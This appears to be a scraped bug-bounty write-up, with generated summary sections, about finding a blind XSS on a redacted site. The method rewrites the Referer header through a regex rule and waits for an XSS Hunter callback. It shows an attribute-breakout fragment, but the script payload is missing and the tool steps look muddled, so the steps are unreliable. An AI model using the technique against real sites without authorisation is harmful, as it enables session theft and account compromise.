How I find Blind XSS Vulnerability in redacted.com

Summary

The author describes their discovery of a Blind XSS vulnerability on redacted.com using XSS Hunter, detailing the steps and methodologies involved in identifying and exploiting this security flaw.

Abstract

In a detailed write-up, the author recounts the process of identifying a Blind XSS vulnerability on a private website, redacted.com. The article outlines the nature of Blind XSS as a type of XSS attack where the malicious script is stored on the server-side and executed under specific conditions, often targeting logs or databases. The author employed XSS Hunter, a platform designed for detecting XSS vulnerabilities, to successfully uncover the vulnerability. The steps included setting up a new rule in XSS Hunter to match the Referer header with a regular expression and replacing it with a malicious script payload. After some time, XSS Hunter confirmed the execution of the Blind XSS attack, demonstrating the site's susceptibility to this type of security breach.

Opinions

The author views XSS Hunter as an effective tool for penetration testing, particularly for monitoring and organizing Blind XSS vulnerabilities.
The article suggests that Blind XSS is a significant security concern, as it can be stored on the server-side and executed at a later time, potentially affecting many users.
The author implies that regular expressions are a powerful means of matching and replacing request headers, which is crucial for the successful execution of Blind XSS attacks during security testing.
The use of XSS Hunter for Blind XSS attacks is highlighted as a key feature of the platform, indicating the author's preference for this tool in such scenarios.
The author's success in finding the Blind XSS vulnerability reflects a proactive approach to security testing and an understanding of the importance of such tests in maintaining web application security.

How I found Blind XSS Vulnerability in redacted.com

Today I want to share with you a Blind XSS which I found in private site.In this write-up I will explain how I found Blind XSS and methodologies.

Blind XSS is a flavor of cross site scripting (XSS), in which the attacker “blindly” publishes a series of malicious payloads on web pages that are likely to keep them in a constant state (such as in the database or in the log).

Currently I use the XSS hunter (Web version) to find out the Blind XSS.

XSShunter:

XSS Hunter is a recently launched platform that makes pen testing for XSS vulnerabilities much easier to monitor and organize. Through it you can launch all kinds of XSS attacks, but where it really shines is when carrying out a Blind XSS attack.

Step 1: To create a new rule, as none of the pre-defined ones does what we need, click “Add”, and you’ll see the new rule dialogue appear. Click the “Type” drop-down and click “Request header”.

Then, add ^Referer.*$ as the “Match” criteria. This string is a regular expression that matches on any header string that starts with Referer. As there should be only one, if any, then a simple match is all we need.

Next, set the “Replace” text as Referer: “>. Then, check the “Regex match” checkbox, and click “OK”.

Step 2: When the response is intercepted, you will see in “Raw” request, that the Referer: “> has been replaced!, as in the image below.

Step 3: After few hours, when I went back to XSSHunter, it showed that a blind XSS had been executed.

How I found Blind XSS Vulnerability in redacted.com

Blind XSS for beginners

I get a lot of DM’s in twitter asking questions about Blind XSS like which tool to use, how to register in XSShunter…

Matthew Setter

When you're testing web applications, sometimes you want to automatically change some part (or parts) of the request…